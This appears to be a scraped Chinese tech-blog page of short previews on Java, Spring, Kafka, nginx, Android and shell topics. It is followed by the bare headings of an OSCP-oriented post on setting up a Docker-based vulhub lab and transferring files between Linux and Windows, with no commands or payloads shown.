原文地址： http://blog.csdn.net/xuyuefei1988/article/details/19399137 1、下面网上收罗的资料初学者应该够用了，但对比IBM的Python 代码调试技巧： IBM：包括 pdb 模块、利用 PyDev 和 Eclipse 集成进行调试、PyCharm 以及 Debug 日志进行调试： http://www.ibm.com/d
webservice传递自定义对象时函数为空，以及boolean不对应的问题 alleni123 webservice
今天在客户端调用方法 NodeStatus status=iservice.getNodeStatus(). 结果NodeStatus的属性都是null。进行debug之后，发现服务器端返回的确实是有值的对象。后来发现原来是因为在客户端，NodeStatus的setter全部被我删除了。本来是因为逻辑上不需要在客户端使用setter，结果改了之后竟然不能获取带属性值的
java如何干掉指针，又如何巧妙的通过引用来操作指针————>说的就是java指针百合不是茶
C语言的强大在于可以直接操作指针的地址，通过改变指针的地址指向来达到更改地址的目的,又是由于c语言的指针过于强大，初学者很难掌握， java的出现解决了c，c++中指针的问题 java将指针封装在底层，开发人员是不能够去操作指针的地址，但是可以通过引用来间接的操作：定义一个指针p来指向a的地址（&是地址符号）：
Eclipse打不开，提示“An error has occurred.See the log file ***/.log” bijian1013 eclipse
打开eclipse工作目录的\.metadata\.log文件，发现如下错误： !ENTRY org.eclipse.osgi 4 0 2012-09-10 09:28:57.139 !MESSAGE Application error !STACK 1 java.lang.NoClassDefFoundError: org/eclipse/core/resources/IContai
spring aop实例annotation方法实现 bijian1013 java spring AOP annotation
在spring aop实例中我们通过配置xml文件来实现AOP，这里学习使用annotation来实现，使用annotation其实就是指明具体的aspect,pointcut和advice。1.申明一个切面(用一个类来实现)在这个切面里,包括了advice和pointcut AdviceMethods.jav
[Velocity一]Velocity语法基础入门 bit1129 velocity
用户和开发人员参考文档 http://velocity.apache.org/engine/releases/velocity-1.7/developer-guide.html 注释 1.行级注释## 2.多行注释#* *# 变量定义使用$开头的字符串是变量定义，例如$var1, $var2, 赋值使用#set为变量赋值，例
【Kafka十一】关于Kafka的副本管理 bit1129 kafka
1. 关于request.required.acks request.required.acks控制者Producer写请求的什么时候可以确认写成功，默认是0， 0表示即不进行确认即返回。 1表示Leader写成功即返回，此时还没有进行写数据同步到其它Follower Partition中 -1表示根据指定的最少Partition确认后才返回，这个在 Th
lua统计nginx内部变量数据 ronin47 lua nginx　统计
server { listen 80; server_name photo.domain.com; location /{set $str $uri; content_by_lua ' local url = ngx.var.uri local res = ngx.location.capture(
java-11.二叉树中节点的最大距离 bylijinnan java
import java.util.ArrayList; import java.util.List; public class MaxLenInBinTree { /* a. 1 / \ 2 3 / \ / \ 4 5 6 7 max=4 pass "root"
Netty源码学习-ReadTimeoutHandler bylijinnan java netty
ReadTimeoutHandler的实现思路：开启一个定时任务，如果在指定时间内没有接收到消息，则抛出ReadTimeoutException 这个异常的捕获，在开发中，交给跟在ReadTimeoutHandler后面的ChannelHandler，例如 private final ChannelHandler timeoutHandler = new ReadTim
jquery验证上传文件样式及大小(好用) cngolon 文件上传 jquery验证
<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <script src="jquery1.8/jquery-1.8.0.
浏览器兼容【转】 cuishikuan css 浏览器 IE
浏览器兼容问题一：不同浏览器的标签默认的外补丁和内补丁不同问题症状：随便写几个标签，不加样式控制的情况下，各自的margin 和padding差异较大。碰到频率:100% 解决方案：CSS里 *{margin:0;padding:0;} 备注：这个是最常见的也是最易解决的一个浏览器兼容性问题，几乎所有的CSS文件开头都会用通配符*来设
Shell特殊变量：Shell $0, $#, $*, $@, $?, $$和命令行参数 daizj shell $#$?特殊变量
前面已经讲到，变量名只能包含数字、字母和下划线，因为某些包含其他字符的变量有特殊含义，这样的变量被称为特殊变量。例如，$ 表示当前Shell进程的ID，即pid，看下面的代码： $echo $$ 运行结果 29949 特殊变量列表变量含义 $0 当前脚本的文件名 $n 传递给脚本或函数的参数。n 是一个数字，表示第几个参数。例如，第一个
程序设计KISS 原则-------KEEP IT SIMPLE, STUPID! dcj3sjt126com unix
翻到一本书，讲到编程一般原则是kiss：Keep It Simple, Stupid.对这个原则深有体会，其实不仅编程如此，而且系统架构也是如此。 KEEP IT SIMPLE, STUPID! 编写只做一件事情，并且要做好的程序；编写可以在一起工作的程序，编写处理文本流的程序，因为这是通用的接口。这就是UNIX哲学.所有的哲学真正的浓缩为一个铁一样的定律，高明的工程师的神圣的“KISS 原
android Activity间List传值 dcj3sjt126com Activity
第一个Activity： import java.util.ArrayList;import java.util.HashMap;import java.util.List;import java.util.Map;import android.app.Activity;import android.content.Intent;import android.os.Bundle;import a
tomcat 设置java虚拟机内存 eksliang tomcat 内存设置
转载请出自出处：http://eksliang.iteye.com/blog/2117772 http://eksliang.iteye.com/ 常见的内存溢出有以下两种: java.lang.OutOfMemoryError: PermGen space java.lang.OutOfMemoryError: Java heap space ------------
Android 数据库事务处理 gqdy365 android
使用SQLiteDatabase的beginTransaction()方法可以开启一个事务，程序执行到endTransaction() 方法时会检查事务的标志是否为成功，如果程序执行到endTransaction()之前调用了setTransactionSuccessful() 方法设置事务的标志为成功则提交事务，如果没有调用setTransactionSuccessful() 方法则回滚事务。事
Java 打开浏览器 hw1287789687 打开网址 open浏览器 open browser 打开url 打开浏览器
使用java 语言如何打开浏览器呢? 我们先研究下在cmd窗口中,如何打开网址使用IE 打开 D:\software\bin>cmd /c start iexplore http://hw1287789687.iteye.com/blog/2153709 使用火狐打开 D:\software\bin>cmd /c start firefox http://hw1287789
ReplaceGoogleCDN：将 Google CDN 替换为国内的 Chrome 插件 justjavac chrome Google google api chrome插件
Chrome Web Store 安装地址： https://chrome.google.com/webstore/detail/replace-google-cdn/kpampjmfiopfpkkepbllemkibefkiice 由于众所周知的原因，只需替换一个域名就可以继续使用Google提供的前端公共库了。同样，通过script标记引用这些资源，让网站访问速度瞬间提速吧
进程VS.线程 m635674608 线程
资料来源： http://www.liaoxuefeng.com/wiki/001374738125095c955c1e6d8bb493182103fac9270762a000/001397567993007df355a3394da48f0bf14960f0c78753f000 1、Apache最早就是采用多进程模式 2、IIS服务器默认采用多线程模式 3、多进程优缺点优点：多进程模式最大
Linux下安装MemCached 字符串 memcached
前提准备：1. MemCached目前最新版本为：1.4.22，可以从官网下载到。2. MemCached依赖libevent，因此在安装MemCached之前需要先安装libevent。2.1 运行下面命令，查看系统是否已安装libevent。[root@SecurityCheck ~]# rpm -qa|grep libevent libevent-headers-1.4.13-4.el6.n
java设计模式之--jdk动态代理（实现aop编程） Supanccy2013 java DAO 设计模式 AOP
与静态代理类对照的是动态代理类，动态代理类的字节码在程序运行时由Java反射机制动态生成，无需程序员手工编写它的源代码。动态代理类不仅简化了编程工作，而且提高了软件系统的可扩展性，因为Java 反射机制可以生成任意类型的动态代理类。java.lang.reflect 包中的Proxy类和InvocationHandler 接口提供了生成动态代理类的能力。 &
Spring 4.2新特性-对java8默认方法(default method)定义Bean的支持 wiselyman spring 4
2.1 默认方法(default method) java8引入了一个default medthod; 用来扩展已有的接口,在对已有接口的使用不产生任何影响的情况下,添加扩展使用default关键字 Spring 4.2支持加载在默认方法里声明的bean 2.2 将要被声明成bean的类 public class DemoService {

oscp--python

漏洞复现01-vulhub环境自动部署

1. 简介

2 安装 docker

如果需要删除所有镜像，容器和卷（第一次安装请忽略）：

备注：apt-get remove会保留软件的配置文件如果想删除请执行以下操作

查看相关软件包是否有残余：

使用purage清除配置文件：

更新索引包

添加软件源的GPG密钥（本人选择的中科大）

中科大：

阿里云：

官方源：

向 source.list 中添加Docker软件源（本人选择的中科大）

中科大源：

阿里源：

官方源：

再次更新索引包

若想直接安装最新版本执行以下命令即可

查看docker版本

查看Docker版本信息

例如：

镜像加速

新版的 Docker 使用 /etc/docker/daemon.json 来配置 Daemon。

请在该配置文件中加入（没有该文件的话，请先建一个）Docker中国官方加速：

3. 人工部署过程

使用完毕后，还要停止镜像

4. 自动化拉取镜像

将文件从Linux传输到Windows（后期利用）

1. 简介

2. HTTP

3. FTP

执行命令

4. TFTP

5. SMB

你可能感兴趣的:(网络安全,公开,python,开发语言)